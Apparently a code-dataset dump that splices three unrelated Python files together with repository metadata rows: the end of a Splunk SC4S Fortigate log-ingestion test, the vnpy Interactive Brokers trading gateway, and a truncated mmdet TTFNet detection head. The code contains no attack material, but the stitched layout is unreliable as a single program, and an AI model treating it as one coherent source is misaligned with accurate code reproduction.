# Tune time functions for Fortigate
time = time[:-7]
tzoffset = insert_char(tzoffset, ":", 3)
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}date={{ date }} time={{ time }} devname={{ host }} devid=FG800C3912801080 logid=0004000017 type=traffic subtype=sniffer level=notice vd=root srcip=fe80::20c:29ff:fe77:20d4 srcintf=\"port3\" dstip=ff02::1:ff77:20d4 dstintf=\"port3\" sessionid=408903 proto=58 action=accept policyid=2 dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=snat transip=:: transport=0 service=\"icmp6/131/0\" duration=36 sentbyte=0 rcvdbyte=40 sentpkt=0 rcvdpkt=0 appid=16321 app=\"IPv6.ICMP\" appcat=\"Network.Service\" apprisk=elevated applist=\"sniffer-profile\" appact=detected utmaction=allow countapp=1\n")
message = mt.render(mark="<111>", bsd=bsd, date=date, time=time, host=host, tzoffset=tzoffset)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
"search _time={{ epoch }} index=netfw host=\"{{ host }}\" sourcetype=\"fgt_traffic\"")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1 | 68.254438 | 721 | 0.723971 |
795bb344eefc7428612d184d46993b617f69b2f7 | 20,927 | py | Python | vnpy/gateway/ib/ib_gateway.py | JonnyORZ/vnpy | c3bb624d95625412a2dd593326abf3833321d2e2 | [
"MIT"
] | 11 | 2019-11-18T06:07:16.000Z | 2020-10-12T11:36:21.000Z | vnpy/gateway/ib/ib_gateway.py | dovnekai/vnpy | 222475fdf97f77f60cec4ecee231f1b85f44df21 | [
"MIT"
] | 2 | 2019-07-17T09:39:34.000Z | 2019-10-19T16:21:55.000Z | vnpy/gateway/ib/ib_gateway.py | dovnekai/vnpy | 222475fdf97f77f60cec4ecee231f1b85f44df21 | [
"MIT"
] | 6 | 2019-10-30T14:52:21.000Z | 2021-01-11T05:41:17.000Z | """
Please install ibapi from Interactive Brokers github page.
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_VT2IB = {
Product.EQUITY: "STK",
Product.FOREX: "CASH",
Product.SPOT: "CMDTY",
Product.OPTION: "OPT",
Product.FUTURES: "FUT",
}
PRODUCT_IB2VT = {v: k for k, v in PRODUCT_VT2IB.items()}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super(IbGateway, self).__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
self.api.connect(host, port, clientid)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
def __init__(self, gateway: BaseGateway):
""""""
super(IbApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super(IbApi, self).nextValidId(orderId)
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super(IbApi, self).currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super(IbApi, self).error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super(IbApi, self).tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now()
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super(IbApi, self).tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super(IbApi, self).tickString(reqId, tickType, value)
if tickType != "45":
return
tick = self.ticks[reqId]
tick.datetime = datetime.fromtimestamp(value)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super(IbApi, self).orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super(IbApi, self).openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
price=ib_order.lmtPrice,
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super(IbApi, self).updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super(IbApi, self).updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"存在不支持的交易所持仓{contract.conId} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
ib_size = contract.multiplier
if not ib_size:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=contract.conId,
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super(IbApi, self).updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super(IbApi, self).contractDetails(reqId, contractDetails)
ib_symbol = contractDetails.contract.conId
ib_exchange = contractDetails.contract.exchange
ib_size = contractDetails.contract.multiplier
ib_product = contractDetails.contract.secType
if not ib_size:
ib_size = 1
contract = ContractData(
symbol=ib_symbol,
exchange=EXCHANGE_IB2VT.get(ib_exchange, ib_exchange),
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_product],
size=ib_size,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super(IbApi, self).execDetails(reqId, contract, execution)
# today_date = datetime.now().strftime("%Y%m%d")
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
time=datetime.strptime(execution.time, "%Y%m%d %H:%M:%S"),
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str): # pylint: disable=invalid-name
"""
Callback of all sub accountid.
"""
super(IbApi, self).managedAccounts(accountsList)
for account_code in accountsList.split(","):
self.client.reqAccountUpdates(True, account_code)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now()
end_str = ""
delta = end - req.start
days = min(delta.days, 180) # IB only provides 6-month data
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
class IbClient(EClient):
    """EClient subclass with a simplified message loop."""

    def run(self):
        """
        Reimplement the original run message loop of eclient.
        Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
        """
        while not self.done and self.isConnected():
            try:
                # Short timeout keeps the loop responsive to `done`/disconnect.
                text = self.msg_queue.get(block=True, timeout=0.2)
                if len(text) > MAX_MSG_LEN:
                    # Oversized message: report through the wrapper and bail out.
                    errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
                    self.wrapper.error(
                        NO_VALID_ID, BAD_LENGTH.code(), errorMsg
                    )
                    self.disconnect()
                    break
                fields = comm.read_fields(text)
                self.decoder.interpret(fields)
            except Empty:
                # Queue timeout — just poll the loop condition again.
                pass
| 27.64465 | 108 | 0.583648 |
795bb4b7b49ee5a3f7a2c0da10bb448cc7de9b41 | 20,968 | py | Python | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | mmdet/models/dense_heads/ttf_head.py | NceBoy/mmd_nce | 47223e88661701a87413136d572f1a56d05d0f03 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init, kaiming_init
import numpy as np
from mmcv.ops import ModulatedDeformConv2dPack as ModulatedDeformConvPack
from mmdet.core import multi_apply, calc_region
from mmcv.runner import force_fp32
from mmdet.models.losses import ct_focal_loss, giou_loss_ct
from mmcv.cnn import (build_norm_layer, bias_init_with_prob, ConvModule)
from .anchor_head import AnchorHead
from ..builder import HEADS, build_loss
@HEADS.register_module()
class TTFHead(AnchorHead):
    """Detection head of TTFNet (Training-Time-Friendly Network).

    Upsamples the deepest backbone feature back to ``1/down_ratio``
    resolution (with shortcut connections from shallower levels), then
    predicts a per-class center heatmap (``hm``) and a 4-channel
    left/top/right/bottom distance map (``wh``).
    """

    def __init__(self,
                 inplanes=(64, 128, 256, 512),
                 planes=(256, 128, 64),
                 use_dla=False,
                 base_down_ratio=32,
                 head_conv=256,
                 wh_conv=64,
                 hm_head_conv_num=2,
                 wh_head_conv_num=2,
                 num_classes=81,
                 shortcut_kernel=3,
                 norm_cfg=dict(type='BN'),
                 shortcut_cfg=(1, 2, 3),
                 wh_offset_base=16.,
                 wh_area_process='log',
                 wh_agnostic=True,
                 wh_gaussian=True,
                 alpha=0.54,
                 beta=0.54,
                 hm_weight=1.,
                 wh_weight=5.,
                 max_objs=128,
                 train_cfg=None,
                 test_cfg=None):
        # Deliberately skip AnchorHead.__init__ (this head is anchor-free).
        super(AnchorHead, self).__init__()
        assert len(planes) in [2, 3, 4]
        assert wh_area_process in [None, 'norm', 'log', 'sqrt']
        self.planes = planes
        self.use_dla = use_dla
        self.head_conv = head_conv
        self.num_classes = num_classes
        self.wh_offset_base = wh_offset_base
        self.wh_area_process = wh_area_process
        self.wh_agnostic = wh_agnostic
        self.wh_gaussian = wh_gaussian
        self.alpha = alpha
        self.beta = beta
        self.hm_weight = hm_weight
        self.wh_weight = wh_weight
        self.max_objs = max_objs
        self.fp16_enabled = False
        # Each entry of `planes` is one 2x upsampling step.
        self.down_ratio = base_down_ratio // 2 ** len(planes)
        self.num_fg = num_classes
        # wh map is 4 channels when class-agnostic, 4 per class otherwise.
        self.wh_planes = 4 if wh_agnostic else 4 * self.num_fg
        self.base_loc = None  # lazily-built pixel coordinate grid (see loss_calc)
        self.regloss = giou_loss_ct
        # repeat upsampling n times. 32x to 4x by default.
        if not self.use_dla:
            shortcut_num = min(len(inplanes) - 1, len(planes))
            assert shortcut_num == len(shortcut_cfg)
            self.deconv_layers = nn.ModuleList([
                self.build_upsample(inplanes[-1], planes[0], norm_cfg=norm_cfg),
                self.build_upsample(planes[0], planes[1], norm_cfg=norm_cfg)
            ])
            for i in range(2, len(planes)):
                self.deconv_layers.append(
                    self.build_upsample(planes[i - 1], planes[i], norm_cfg=norm_cfg))
            padding = (shortcut_kernel - 1) // 2
            self.shortcut_layers = self.build_shortcut(
                inplanes[:-1][::-1][:shortcut_num], planes[:shortcut_num], shortcut_cfg,
                kernel_size=shortcut_kernel, padding=padding)
        # heads
        self.wh = self.build_head(self.wh_planes, wh_head_conv_num, wh_conv)
        self.hm = self.build_head(self.num_fg, hm_head_conv_num)

    def _init_layers(self):
        # Layers are built in __init__; override AnchorHead's hook as a no-op.
        pass

    def build_shortcut(self,
                       inplanes,
                       planes,
                       shortcut_cfg,
                       kernel_size=3,
                       padding=1):
        """Build one ShortcutConv2d per lateral backbone level."""
        assert len(inplanes) == len(planes) == len(shortcut_cfg)
        shortcut_layers = nn.ModuleList()
        for (inp, outp, layer_num) in zip(
                inplanes, planes, shortcut_cfg):
            assert layer_num > 0
            layer = ShortcutConv2d(
                inp, outp, [kernel_size] * layer_num, [padding] * layer_num)
            shortcut_layers.append(layer)
        return shortcut_layers

    def build_upsample(self, inplanes, planes, norm_cfg=None):
        """Conv (+ optional norm, ReLU) followed by 2x bilinear upsampling.

        NOTE(review): the deformable-conv variant is commented out; a plain
        3x3 conv is used instead — confirm this is intended.
        """
        # mdcn = ModulatedDeformConvPack(inplanes, planes, 3, stride=1,
        #                                padding=1, dilation=1, deformable_groups=1)
        mdcn = nn.Conv2d(inplanes, planes, 3, stride=1,
                         padding=1, dilation=1)
        up = nn.UpsamplingBilinear2d(scale_factor=2)
        layers = []
        layers.append(mdcn)
        if norm_cfg:
            layers.append(build_norm_layer(norm_cfg, planes)[1])
        layers.append(nn.ReLU(inplace=True))
        layers.append(up)
        return nn.Sequential(*layers)

    def build_head(self, out_channel, conv_num=1, head_conv_plane=None):  # head_conv_plane=64 conv_num=2 out_channel=4
        """Stack `conv_num` 3x3 ConvModules, then a 1x1 prediction conv."""
        head_convs = []
        head_conv_plane = self.head_conv if not head_conv_plane else head_conv_plane
        for i in range(conv_num):
            inp = self.planes[-1] if i == 0 else head_conv_plane
            head_convs.append(ConvModule(inp, head_conv_plane, 3, padding=1))
        inp = self.planes[-1] if conv_num <= 0 else head_conv_plane
        head_convs.append(nn.Conv2d(inp, out_channel, 1))
        return nn.Sequential(*head_convs)

    def init_weights(self):
        """Kaiming init for shortcuts, focal-loss bias init for the hm head."""
        if not self.use_dla:
            for _, m in self.shortcut_layers.named_modules():
                if isinstance(m, nn.Conv2d):
                    kaiming_init(m)
        if not self.use_dla:
            for _, m in self.deconv_layers.named_modules():
                if isinstance(m, nn.BatchNorm2d):
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
        for _, m in self.hm.named_modules():
            if isinstance(m, nn.Conv2d):
                normal_init(m, std=0.01)
        # Bias so the initial heatmap probability is ~0.01 (focal-loss trick).
        bias_cls = bias_init_with_prob(0.01)
        normal_init(self.hm[-1], std=0.01, bias=bias_cls)
        for _, m in self.wh.named_modules():
            if isinstance(m, nn.Conv2d):
                normal_init(m, std=0.001)

    def forward(self, feats, onnx=False):
        """
        Args:
            feats: list(tensor).
            onnx: when True, apply sigmoid to the heatmap inside the graph.

        Returns:
            hm: tensor, (batch, 80, h, w).
            wh: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
        """
        x = feats[-1]
        if not self.use_dla:
            for i, upsample_layer in enumerate(self.deconv_layers):
                x = upsample_layer(x)
                if i < len(self.shortcut_layers):
                    # Fuse with the matching shallower backbone level.
                    shortcut = self.shortcut_layers[i](feats[-i - 2])
                    x = x + shortcut
        hm = self.hm(x)
        # NOTE(review): wh_offset_base scaling is disabled here — confirm
        # the loss/decoding expects raw ReLU outputs.
        # wh = F.relu(self.wh(x)) * self.wh_offset_base
        wh = F.relu(self.wh(x))
        if onnx:
            hm = F.sigmoid(hm)
        return hm, wh

    @force_fp32(apply_to=('pred_heatmap', 'pred_wh'))
    def get_bboxes(self,
                   pred_heatmap,
                   pred_wh,
                   img_metas,
                   cfg=None,
                   rescale=False):
        """Decode heatmap + wh maps into per-image (bboxes, labels) pairs."""
        batch, cat, height, width = pred_heatmap.size()
        pred_heatmap = pred_heatmap.detach().sigmoid_()
        wh = pred_wh.detach()
        # perform nms on heatmaps
        heat = self.simple_nms(pred_heatmap)  # used maxpool to filter the max score
        topk = getattr(cfg, 'max_per_img', 100)
        # (batch, topk)
        scores, inds, clses, ys, xs = self._topk(heat, topk=topk)
        # Map feature-map coordinates back to input-image pixels.
        xs = xs.view(batch, topk, 1) * self.down_ratio
        ys = ys.view(batch, topk, 1) * self.down_ratio
        wh = wh.permute(0, 2, 3, 1).contiguous()
        wh = wh.view(wh.size(0), -1, wh.size(3))
        inds = inds.unsqueeze(2).expand(inds.size(0), inds.size(1), wh.size(2))
        wh = wh.gather(1, inds)
        if not self.wh_agnostic:
            # Pick the 4 channels belonging to each detection's class.
            wh = wh.view(-1, topk, self.num_fg, 4)
            wh = torch.gather(wh, 2, clses[..., None, None].expand(
                clses.size(0), clses.size(1), 1, 4).long())
            wh = wh.view(batch, topk, 4)
        clses = clses.view(batch, topk, 1).float()
        scores = scores.view(batch, topk, 1)
        # wh channels are distances (left, top, right, bottom) from the center.
        bboxes = torch.cat([xs - wh[..., [0]], ys - wh[..., [1]],
                            xs + wh[..., [2]], ys + wh[..., [3]]], dim=2)
        result_list = []
        score_thr = getattr(cfg, 'score_thr', 0.01)
        for batch_i in range(bboxes.shape[0]):
            scores_per_img = scores[batch_i]
            scores_keep = (scores_per_img > score_thr).squeeze(-1)
            scores_per_img = scores_per_img[scores_keep]
            bboxes_per_img = bboxes[batch_i][scores_keep]
            labels_per_img = clses[batch_i][scores_keep]
            img_shape = img_metas[batch_i]['pad_shape']
            # Clip boxes to the padded image extent.
            bboxes_per_img[:, 0::2] = bboxes_per_img[:, 0::2].clamp(min=0, max=img_shape[1] - 1)
            bboxes_per_img[:, 1::2] = bboxes_per_img[:, 1::2].clamp(min=0, max=img_shape[0] - 1)
            if rescale:
                scale_factor = img_metas[batch_i]['scale_factor']
                bboxes_per_img /= bboxes_per_img.new_tensor(scale_factor)
            bboxes_per_img = torch.cat([bboxes_per_img, scores_per_img], dim=1)
            labels_per_img = labels_per_img.squeeze(-1)
            result_list.append((bboxes_per_img, labels_per_img))
        return result_list

    @force_fp32(apply_to=('pred_heatmap', 'pred_wh'))
    def loss(self,
             pred_heatmap,
             pred_wh,
             gt_bboxes,
             gt_labels,
             img_metas,
             cfg=None,
             gt_bboxes_ignore=None):
        """Compute heatmap focal loss and GIoU box regression loss."""
        all_targets = self.target_generator(gt_bboxes, gt_labels, img_metas)
        hm_loss, wh_loss = self.loss_calc(pred_heatmap, pred_wh, *all_targets)
        return {'losses/ttfnet_loss_heatmap': hm_loss, 'losses/ttfnet_loss_wh': wh_loss}

    def _topk(self, scores, topk):
        """Return top-k (score, flat index, class, y, x) over all classes."""
        batch, cat, height, width = scores.size()
        # both are (batch, 80, topk)
        topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), topk)
        topk_inds = topk_inds % (height * width)
        topk_ys = (topk_inds / width).int().float()
        topk_xs = (topk_inds % width).int().float()
        # both are (batch, topk). select topk from 80*topk
        topk_score, topk_ind = torch.topk(topk_scores.view(batch, -1), topk)
        topk_clses = (topk_ind / topk).int()
        topk_ind = topk_ind.unsqueeze(2)
        topk_inds = topk_inds.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
        topk_ys = topk_ys.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
        topk_xs = topk_xs.view(batch, -1, 1).gather(1, topk_ind).view(batch, topk)
        return topk_score, topk_inds, topk_clses, topk_ys, topk_xs

    def gaussian_2d(self, shape, sigma_x=1, sigma_y=1):
        """2-D anisotropic Gaussian kernel of the given (h, w) shape."""
        m, n = [(ss - 1.) / 2. for ss in shape]
        y, x = np.ogrid[-m:m + 1, -n:n + 1]
        h = np.exp(-(x * x / (2 * sigma_x * sigma_x) + y * y / (2 * sigma_y * sigma_y)))
        # Zero out numerically negligible tails.
        h[h < np.finfo(h.dtype).eps * h.max()] = 0
        return h

    def draw_truncate_gaussian(self, heatmap, center, h_radius, w_radius, k=1):
        """Paint a truncated Gaussian of the given radii onto `heatmap` in place."""
        h, w = 2 * h_radius + 1, 2 * w_radius + 1
        sigma_x = w / 6
        sigma_y = h / 6
        gaussian = self.gaussian_2d((h, w), sigma_x=sigma_x, sigma_y=sigma_y)
        gaussian = heatmap.new_tensor(gaussian)
        x, y = int(center[0]), int(center[1])
        height, width = heatmap.shape[0:2]
        # Clip the kernel to the heatmap borders.
        left, right = min(x, w_radius), min(width - x, w_radius + 1)
        top, bottom = min(y, h_radius), min(height - y, h_radius + 1)
        masked_heatmap = heatmap[y - top:y + bottom, x - left:x + right]
        masked_gaussian = gaussian[h_radius - top:h_radius + bottom,
                                   w_radius - left:w_radius + right]
